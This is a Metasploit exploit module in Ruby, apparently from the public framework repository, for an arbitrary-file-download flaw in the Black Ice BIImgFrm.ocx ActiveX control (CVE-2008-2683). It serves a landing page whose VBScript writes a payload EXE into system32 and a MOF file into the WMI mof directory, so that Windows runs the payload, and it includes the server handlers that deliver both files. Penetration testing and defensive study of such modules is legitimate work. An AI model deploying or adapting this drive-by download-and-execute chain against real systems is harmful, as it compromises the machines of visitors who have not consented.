GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec

  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({
  #   :os_name => OperatingSystems::Match::WINDOWS,
  #   :ua_name => HttpClients::IE,
  #   :javascript => true,
  #   :rank => NormalRanking,
  #   :classid => "{79956462-F148-497F-B247-DF35A095F80B}",
  #   :method => "DownloadImageFileURL",
  # })

  # CLSID of the BIImgFrm.ocx control the landing page instantiates.
  CLSID = '79956462-F148-497F-B247-DF35A095F80B'.freeze
  # Control method invoked from the page; it takes a URL and a local destination path.
  DOWNLOAD_METHOD = 'DownloadImageFileURL'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Black Ice Cover Page ActiveX Control Arbitrary File Download',
        'Description' => %q{
          This module allows remote attackers to place arbitrary files on a users file system
          by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX
          Control (BIImgFrm.ocx 12.0.0.0). Code execution can be achieved by first uploading the
          payload to the remote machine, and then upload another mof file, which enables Windows
          Management Instrumentation service to execute the binary. Please note that this module
          currently only works for Windows before Vista. Also, a similar issue is reported in
          BIDIB.ocx (10.9.3.0) within the Barcode SDK.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'shinnai', # original discovery
          'mr_me <steventhomasseeley[at]gmail.com>', # msf
          'sinn3r' # wbemexec tekniq
        ],
        'References' => [
          [ 'CVE', '2008-2683'],
          [ 'OSVDB', '46007'],
          [ 'BID', '29577'],
          [ 'EDB', '5750' ],
        ],
        'DefaultOptions' => {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
        'Payload' => {
          'Space' => 2048,
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          # Windows before Vista
          [ 'Automatic', {} ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2008-06-05',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Keeps the module out of automatic exploit selection (the autopwn metadata above is
  # commented out as well).
  def autofilter
    false
  end

  # Dependency hook: pulls in zlib before the module runs.
  def check_dependencies
    use_zlib
  end

  # Single HTTP handler for the three resources the module serves, selected by request path:
  #   *.EXE  -> the payload executable generated once in #exploit
  #   *.MOF  -> a MOF file referencing that payload (only once a landing page has been served,
  #             because the landing page is what assigns @mof_name / @payload_name)
  #   other  -> the landing page that drives the vulnerable control
  # Every landing-page hit picks fresh random file names, so the EXE/MOF names requested
  # afterwards differ from visit to visit.
  #
  # @param cli the client connection the response is written to
  # @param request the parsed HTTP request; only its URI is inspected
  def on_request_uri(cli, request)
    case request.uri
    when /\.EXE/
      print_status("Sending EXE payload...")
      send_response(cli, @payload, { 'Content-Type' => 'application/octet-stream' })
    when /\.MOF/
      # Nothing to serve until a landing page has chosen the file names.
      return unless @mof_name && @payload_name

      print_status("Generating mof")
      mof = generate_mof(@mof_name, @payload_name)
      print_status("Sending MOF")
      send_response(cli, mof, { 'Content-Type' => 'application/octet-stream' })
    else
      content = landing_page(server_url(cli))
      print_status("Sending exploit HTML")
      send_response_html(cli, content)
      handler(cli)
    end
  end

  # Generates the payload EXE once per run, then starts the HTTP server.
  def exploit
    @payload = generate_payload_exe
    super
  end

  private

  # Base URL (with trailing slash) the victim's browser fetches the EXE and MOF from.
  # When the server is bound to every interface, the address routable from the client is
  # substituted for 0.0.0.0.
  def server_url(cli)
    host = datastore['SRVHOST']
    host = Rex::Socket.source_address(cli.peerhost) if host == '0.0.0.0'
    "http://#{host}:#{datastore['SRVPORT']}#{get_resource}/"
  end

  # Builds the landing page. It embeds the vulnerable control and calls DOWNLOAD_METHOD
  # twice: immediately, to write the payload to C:\WINDOWS\system32, and again from a
  # subroutine scheduled 4000 ms later, to drop the MOF into C:\WINDOWS\system32\wbem\mof,
  # which (per the module description) is what makes WMI run the binary on pre-Vista
  # Windows. The delay exists so the second download does not interrupt the first on slow
  # connections. Object id, subroutine and variable names are randomized per page.
  #
  # Side effect: assigns @payload_name and @mof_name, which the *.MOF handler relies on.
  # Detection note: on the host this shows up as IE instantiating the CLSID above followed
  # by two file creations under system32, one of them a .MOF in the wbem\mof directory.
  #
  # @param url [String] base URL returned by #server_url
  # @return [String] the HTML document to send
  def landing_page(url)
    blackice = rand_text_alpha(rand(1..100)) # BlackIce object ID
    @payload_name = "#{rand_text_alpha(rand(1..10))}.EXE" # Payload name
    payload_vbs_url_name = rand_text_alpha(5) # Payload's vbs var name
    payload_vbs_lpath = rand_text_alpha(6) # Payload's lpath var name
    @mof_name = "#{rand_text_alpha(rand(1..10))}.MOF" # MOF path on victim machine
    mof_vbs_url_name = rand_text_alpha(5) # MOF's vbs var name
    mof_vbs_lpath = rand_text_alpha(6) # MOF's lpath var name
    sub_name = rand_text_alpha(rand(1..10)) # Subroutine name

    # Squiggly heredoc strips the common indentation, so no post-processing is needed.
    <<~EOS
      <html>
      <object classid='clsid:#{CLSID}' id='#{blackice}' ></object>
      <script language='vbscript'>
      sub #{sub_name}
      #{mof_vbs_url_name} = "#{url}#{@mof_name}"
      #{mof_vbs_lpath} = "C:\\WINDOWS\\system32\\wbem\\mof\\#{@mof_name}"
      #{blackice}.#{DOWNLOAD_METHOD} #{mof_vbs_url_name}, #{mof_vbs_lpath}
      end sub

      #{payload_vbs_url_name} = "#{url}#{@payload_name}"
      #{payload_vbs_lpath} = "C:\\WINDOWS\\system32\\#{@payload_name}"
      #{blackice}.#{DOWNLOAD_METHOD} #{payload_vbs_url_name}, #{payload_vbs_lpath}
      setTimeout "#{sub_name}()", 4000
      </script>
      </html>
    EOS
  end
end